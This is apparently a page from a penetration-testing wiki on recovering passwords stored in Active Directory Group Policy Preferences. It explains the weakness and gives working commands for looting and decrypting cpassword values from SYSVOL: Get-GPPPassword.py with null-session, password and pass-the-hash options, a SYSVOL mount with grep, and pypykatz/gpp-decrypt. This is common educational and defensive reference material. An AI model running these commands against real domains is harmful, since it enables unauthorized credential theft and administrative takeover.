Group Policy Preferences

Theory

Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.

Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.
Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).
Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted🤷‍♂️.

Practice

From UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse .xml files and loot for passwords.

bash

# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'

# with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

# pass-the-hash
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

Alternatively, searching for passwords can be done manually (or with Metasploit's smb_enum_gpp module), however it requires mounting the SYSVOL share, which can't be done through a docker environment unless it's run with privileged rights.

Tools like pypykatz (Python) and gpp-decrypt (Ruby) can then be used to decrypt the matches.

bash

# create the target directory for the mount
sudo mkdir /tmp/sysvol

# mount the SYSVOL share
sudo mount\
 -o domain='domain.local'\
 -o username='someuser'\
 -o password='password'\
 -t cifs\
 '//domain_controller/SYSVOL'\
 /tmp/sysvol

# recursively look for "cpassword" in Group Policies
sudo grep -ria cpassword /tmp/sysvol/'domain.local'/Policies/ 2>/dev/null

# decrypt the string and recover the password
pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Resources

https://adsecurity.org/?p=2288

http://blog.carnal0wnage.com/2012/10/group-policy-preferences-and-getting.html

https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be

Reconnaissance

Movement

Credentials

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Netlogon

Certificate Services (AD-CS)

SCCM / MECM

Exchange services

Print Spooler Service

Schannel

Built-ins & settings

Kerberos

Certificate Services (AD-CS)

HTTP security headers

Identity and Access Management

File inclusion

LFI to RCE

Initial access (protocols)

Windows

UNIX-like

(AV) Anti-Virus

Mifare Classic

Android

Group Policy Preferences

Theory

Practice

Resources

Dumping

Bruteforcing

MITM and coerced auths

NTLM

Kerberos

Forged tickets

Delegations

DACL abuse

Certificate Services (AD-CS)

SCCM / MECM

Certificate Services (AD-CS)

HTTP security headers

File inclusion

LFI to RCE

Windows

UNIX-like

Mifare Classic

Group Policy Preferences ​

Theory ​

Practice ​

Resources ​

Group Policy Preferences

Theory

Practice

Resources